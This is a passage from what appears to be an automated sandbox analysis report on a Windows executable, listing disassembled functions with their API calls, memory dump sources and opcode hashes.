                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Process$AffinityCurrentMask
                                              • String ID:
                                              • API String ID: 1231390398-0
                                              • Opcode ID: b52bb84c5af7ea68fc775621ac060e1aba66292e26f1bd5d219119da78b33388
                                              • Instruction ID: fda61311339ddcdefa45cbec751055f331274b8383790432ce215cbc28627205
                                              • Opcode Fuzzy Hash: b52bb84c5af7ea68fc775621ac060e1aba66292e26f1bd5d219119da78b33388
                                              • Instruction Fuzzy Hash: E4E09232F14907A78F1987ADDC05BAF72ADBA452483184279F423D3100E974DE0146A0
                                              Function 00CAF53A Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00CC9B73,000000FF), ref: 00CAF578
                                              • CoUninitialize.COMBASE(?,?,?,?,00CC9B73,000000FF), ref: 00CAF57D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: GdiplusShutdownUninitialize
                                              • String ID:
                                              • API String ID: 3856339756-0
                                              • Opcode ID: ff477342cf51172ee6dea1d41e66c54338ba39df872d4e84b73a3b519be89767
                                              • Instruction ID: 95051815438fe6df651c816576ba50b4c0832839adafe9e969680211bfc8d718
                                              • Opcode Fuzzy Hash: ff477342cf51172ee6dea1d41e66c54338ba39df872d4e84b73a3b519be89767
                                              • Instruction Fuzzy Hash: DAF05E76A04A44AFC711DF59EC85F8EBBA8FB48760F00422AF516C3760CB74A800CA90
                                              Function 00CAE849 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CAE86A
                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CAE871
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: BitmapCreateFromGdipStream
                                              • String ID:
                                              • API String ID: 1918208029-0
                                              • Opcode ID: 092490c08f79b783721cce5b431196c1b1602fac517d6f8682c2b75b3c32682e
                                              • Instruction ID: 97fb779c31f36732e67b37b10ac1c8836d357df3368e19790b0b25c2a5b7b1a5
                                              • Opcode Fuzzy Hash: 092490c08f79b783721cce5b431196c1b1602fac517d6f8682c2b75b3c32682e
                                              • Instruction Fuzzy Hash: E2E09271800218EFCB10DF49C801BDDB7F8EB05354F20805AF88593741E674AF00EB90
                                              Function 00C91E1F Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ItemShowWindow
                                              • String ID:
                                              • API String ID: 3351165006-0
                                              • Opcode ID: 414490400f2c19eba17a178ac2a461a24ad7fc7c73c5a3a0eaebbc1847df071d
                                              • Instruction ID: 68f17762adc21d2a5db2e74f55e49eb5ab12c6c661fe0677a5ef7fa2ada54258
                                              • Opcode Fuzzy Hash: 414490400f2c19eba17a178ac2a461a24ad7fc7c73c5a3a0eaebbc1847df071d
                                              • Instruction Fuzzy Hash: FFC0123205C380BECB010BB0DC09F2EBBA8ABA6212F00CA08F0A9C0060C23DC010DB11
                                              Function 00C91CC4 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00C91CD2
                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00C91CD9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherItemUser
                                              • String ID:
                                              • API String ID: 4250310104-0
                                              • Opcode ID: eb6039097db46d708e968dec72b8c6828118a0e0d47ba2286a818421ef1a5493
                                              • Instruction ID: e32a0f2df17af3d2f4e29c8f50e30b92d48d9f5d8dd71f5d7a006cf13820f474
                                              • Opcode Fuzzy Hash: eb6039097db46d708e968dec72b8c6828118a0e0d47ba2286a818421ef1a5493
                                              • Instruction Fuzzy Hash: AAC04C7640C380BFCB015BA09D5CE2FBFA9AB95311F00CA49F5A984120C6358410DB11
                                              Function 00C927E0 Relevance: 1.8, APIs: 1, Instructions: 306COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 6e9bd8e2c0278d9596f709b8f314cbd24995f36ed418d2679f7d9c8f3dd80a73
                                              • Instruction ID: 32e85a7106c0eab11c931ce8e57e90e9803ebe44cc345d8de0ca1e0988b04b28
                                              • Opcode Fuzzy Hash: 6e9bd8e2c0278d9596f709b8f314cbd24995f36ed418d2679f7d9c8f3dd80a73
                                              • Instruction Fuzzy Hash: 3AC18F31A04255ABDF25DF64C8D8BED7BE4AF05310F1800B9EC9ADF296C7349A45CBA1
                                              Function 00CA9556 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 172c65c105d6320b72a46eb17479de53db41064bed89303071dfeb1d0498781f
                                              • Instruction ID: a0d4a735d0f10c675dd78ba4fee321bddd02f7a152630aa4957e971497f32c36
                                              • Opcode Fuzzy Hash: 172c65c105d6320b72a46eb17479de53db41064bed89303071dfeb1d0498781f
                                              • Instruction Fuzzy Hash: B68129719043168FDB24EF68C887B9EB7E4FF46308F04092EF96597281EBB49A44C791
                                              Function 00C920B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00C920B7
                                                • Part of subcall function 00C980EC: __EH_prolog3.LIBCMT ref: 00C980F3
                                                • Part of subcall function 00CA2815: __EH_prolog3.LIBCMT ref: 00CA281C
                                                • Part of subcall function 00C976E7: __EH_prolog3.LIBCMT ref: 00C976EE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 95b337ee719c712a25dc51abdef608a948ce2255d82b9aaef6a2b7765c6878fa
                                              • Instruction ID: 890f929935a92db3bbb60219f72609ea68c9b07fd730e6bf3fa17cbcedf3af6a
                                              • Opcode Fuzzy Hash: 95b337ee719c712a25dc51abdef608a948ce2255d82b9aaef6a2b7765c6878fa
                                              • Instruction Fuzzy Hash: F651F3B5A057808EDB44DF2A85847C9BBE0AF99300F0882BEDC4DDE69BDB740254DB61
                                              Function 00C9B3E1 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9B3E8
                                                • Part of subcall function 00C9F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?,?,?,?), ref: 00C9F739
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CloseFindH_prolog3_
                                              • String ID:
                                              • API String ID: 2672038326-0
                                              • Opcode ID: 38d41046720624eff4ae6b1d7710f4cbbae82d79699190499fa337ef7d1bdd59
                                              • Instruction ID: 2212f8c19859f4e9116e17f7b74a53f6e8fb6ce0d4129b9e6fce9bc524eab2c6
                                              • Opcode Fuzzy Hash: 38d41046720624eff4ae6b1d7710f4cbbae82d79699190499fa337ef7d1bdd59
                                              • Instruction Fuzzy Hash: D6418A70900709EFCF20DFA9DA89BA9B7F1BF05304F14446DE05A9B252D730AD02EB21
                                              Function 00C92C30 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C92C37
                                                • Part of subcall function 00CA880E: __EH_prolog3.LIBCMT ref: 00CA8815
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3H_prolog3_
                                              • String ID:
                                              • API String ID: 3355343447-0
                                              • Opcode ID: 70ffc5aebcf6ad2b94b9f425431cd11ae1e73162f907f0202839c0a59e8e0ce0
                                              • Instruction ID: c342d28af37f153ed22103e82fab5cf9f1a8ec486028b20a336e2c0ecac80ad0
                                              • Opcode Fuzzy Hash: 70ffc5aebcf6ad2b94b9f425431cd11ae1e73162f907f0202839c0a59e8e0ce0
                                              • Instruction Fuzzy Hash: 88313E7190120CFFDF15EBE4D8899EEBBB9AF19300F54002AF441B7251CB309A49DB20
                                              Function 00C976E7 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00C976EE
                                                • Part of subcall function 00CA4F2B: __EH_prolog3.LIBCMT ref: 00CA4F32
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: f9a3fb124e089a8a33562c06287c5f674da62eb3a61cf71d75c290f09dcb084e
                                              • Instruction ID: 32a84183bb59b677c9faec7ba66bda07f3912788c91bdfae42abcd43b3303084
                                              • Opcode Fuzzy Hash: f9a3fb124e089a8a33562c06287c5f674da62eb3a61cf71d75c290f09dcb084e
                                              • Instruction Fuzzy Hash: 0C4151B4816B85CAC724DF7AD1493CAFBE8AFA5304F10995FD0AE93361DBB025049F19
                                              Function 00CA97A4 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 14333df11d21dff4617c39d0f51e443584e95c8bce8d806523983409512f4659
                                              • Instruction ID: 479c01a1788235ba50fc7e1b025c0b24749bdcc782101d3b9061cdf4887ab4ce
                                              • Opcode Fuzzy Hash: 14333df11d21dff4617c39d0f51e443584e95c8bce8d806523983409512f4659
                                              • Instruction Fuzzy Hash: 142186B1A006169BEF189F74CD4AB5E76A8FF05318F05423AE515EB2C1DB749A40C7E4
                                              Function 00C9D771 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 80b0b40b8ae19a12c0b5c638e87c5693a9249729d066f9fb3a3590f4f2276b85
                                              • Instruction ID: d24e6831785a4cd254399c7e2ef81ecaa355917bc9da8e08e782a20cc47bb5a9
                                              • Opcode Fuzzy Hash: 80b0b40b8ae19a12c0b5c638e87c5693a9249729d066f9fb3a3590f4f2276b85
                                              • Instruction Fuzzy Hash: 8E219076A0062A9BDF14DFE9CC85AEFB7B9BF88300F14401AE511B7205DF709E019BA5
                                              Function 00C9EAF3 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3_
                                              • String ID:
                                              • API String ID: 2427045233-0
                                              • Opcode ID: ed4f14d13e10c6db5eb7dda7200988f0fc027b528f957d837ac9721f339aa71a
                                              • Instruction ID: be4b6f0d33ad5306d9b443e103cbbe9d47ddbf14e279225388ce68f9c824b362
                                              • Opcode Fuzzy Hash: ed4f14d13e10c6db5eb7dda7200988f0fc027b528f957d837ac9721f339aa71a
                                              • Instruction Fuzzy Hash: FD21C030601318AFDF20DE65C84AFEE73E9EF22B54F181548F852A7581DB709E4AE764
                                              Function 00CB437D Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3_
                                              • String ID:
                                              • API String ID: 2427045233-0
                                              • Opcode ID: d3cf3f1690c9a6a165c42dfd50cc5df1920b28af42b2fa32b51402cb924a0d2e
                                              • Instruction ID: 6100be6f0a2e0ec31f4dc40341399ccbb29ae754bbb499ab2eeb84ab30799026
                                              • Opcode Fuzzy Hash: d3cf3f1690c9a6a165c42dfd50cc5df1920b28af42b2fa32b51402cb924a0d2e
                                              • Instruction Fuzzy Hash: C3213071904209DEDF18EFE4D886BDE7BF9AF49300F140019E504E72A2DA359A45DB61
                                              Function 00CC3129 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CC1DE6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC00BA,00000001,00000364,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E), ref: 00CC1E27
                                              • _free.LIBCMT ref: 00CC3195
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                              • Instruction ID: 6147815f9253af83818e6503a46adea1fed4f0caa8ce9fcb04baf2bd7313b741
                                              • Opcode Fuzzy Hash: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                              • Instruction Fuzzy Hash: E101D6722043456FE321CF66DC45E5AFBD9EB86370F29061DE59593280EA30AA05C774
                                              Function 00CB4300 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3_
                                              • String ID:
                                              • API String ID: 2427045233-0
                                              • Opcode ID: a866cb802969f89cdcaf8e2a2ab6f05416db5817d9cf962a0d33ed9ccb55ca13
                                              • Instruction ID: a85d3a121eafdce8ee40a8451cb0b27abd1119cc20f5f93500528f72ca3eadd2
                                              • Opcode Fuzzy Hash: a866cb802969f89cdcaf8e2a2ab6f05416db5817d9cf962a0d33ed9ccb55ca13
                                              • Instruction Fuzzy Hash: 3A016DB1845249EEDF00EBE4C88ABCEB7B8AF14315F484065F500A6192CA789B49EB71
                                              Function 00CC1DE6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC00BA,00000001,00000364,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E), ref: 00CC1E27
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 31b563452bf1b2320c61831b917a7f97de7b3c6166aabfbf91fe0627f388cb40
                                              • Instruction ID: e2cb7442d977719d06187c6b57b1dd080312c4e5bbf94b2a91b3d7344e49dcb2
                                              • Opcode Fuzzy Hash: 31b563452bf1b2320c61831b917a7f97de7b3c6166aabfbf91fe0627f388cb40
                                              • Instruction Fuzzy Hash: CDF0B431605124A6EF221B63DC09F9B7748AF427B0B2C806DFC18EA292CA60DA0192E0
                                              Function 00CC040E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,00CB535E,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?,?,?,?), ref: 00CC0440
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
